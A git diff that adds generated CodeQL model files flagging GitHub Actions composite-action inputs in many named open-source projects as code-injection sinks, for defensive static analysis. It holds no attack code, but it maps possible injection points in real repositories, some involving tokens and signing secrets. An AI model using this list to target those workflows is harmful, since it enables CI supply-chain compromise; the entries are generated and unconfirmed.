a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml new file mode 100644 index 00000000000..80a23352e55 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml new file mode 100644 index 00000000000..441c8ebcd52 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml new file mode 100644 index 00000000000..d4e8a2c32bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml new file mode 100644 index 00000000000..ce3ed699b9a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml new file mode 100644 index 00000000000..8b62fe8e0aa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml new file mode 100644 index 00000000000..946faca35c9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml new file mode 100644 index 00000000000..b68c9462c1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml new file mode 100644 index 00000000000..aedefc9ee02 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml new file mode 100644 index 00000000000..36f7a18e198 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml new file mode 100644 index 00000000000..a1d324f44bd --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml new file mode 100644 index 00000000000..53142801fec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml new file mode 100644 index 00000000000..5170beb3a7a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml new file mode 100644 index 00000000000..1fabdd9085b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml new file mode 100644 index 00000000000..370d3c6954e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml new file mode 100644 index 00000000000..ac0156b719f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml new file mode 100644 index 00000000000..9ee197ed884 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml new file mode 100644 index 00000000000..99a1e4cec71 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml new file mode 100644 index 00000000000..d2a6dbd4929 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml new file mode 100644 index 00000000000..13a9ff475b9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml new file mode 100644 index 00000000000..a173154bec0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml new file mode 100644 index 00000000000..f7a5017d2fb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml new file mode 100644 index 00000000000..1bcf118810f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml new file mode 100644 index 00000000000..fb210d5af55 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml new file mode 100644 index 00000000000..77554b9872e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml new file mode 100644 index 00000000000..7fc1eaaca48 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml new file mode 100644 index 00000000000..921095f8a38 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml new file mode 100644 index 00000000000..e8dba39c742 
--- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml new file mode 100644 index 00000000000..69970d3419b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml new file mode 100644 index 00000000000..b57797cc643 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml new file mode 100644 index 00000000000..08b65cea6d7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml new file mode 100644 index 00000000000..453e60f3595 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml new file mode 100644 index 00000000000..012802b8006 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml new file mode 100644 index 00000000000..a397a77f6dc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml new file mode 100644 index 00000000000..15de610c981 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml new file mode 100644 index 00000000000..ad6e7e806cd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml new file mode 100644 index 00000000000..67631102d71 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml new file mode 100644 index 00000000000..098d7c139fa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml new file mode 100644 index 00000000000..def12e48741 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml new file mode 100644 index 00000000000..768db7317cc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml new file mode 100644 index 00000000000..55218009c02 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml new file mode 100644 index 00000000000..17ec5471e85 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml new file mode 100644 index 00000000000..55cd8b18241 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml new file mode 100644 index 00000000000..328d58d9e42 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml new file mode 100644 index 00000000000..836bda1041a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml new file mode 100644 index 00000000000..b6f9ee027f1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml new file mode 100644 index 00000000000..2f6458219b6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml new file mode 100644 index 00000000000..374a13ccd82 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml 
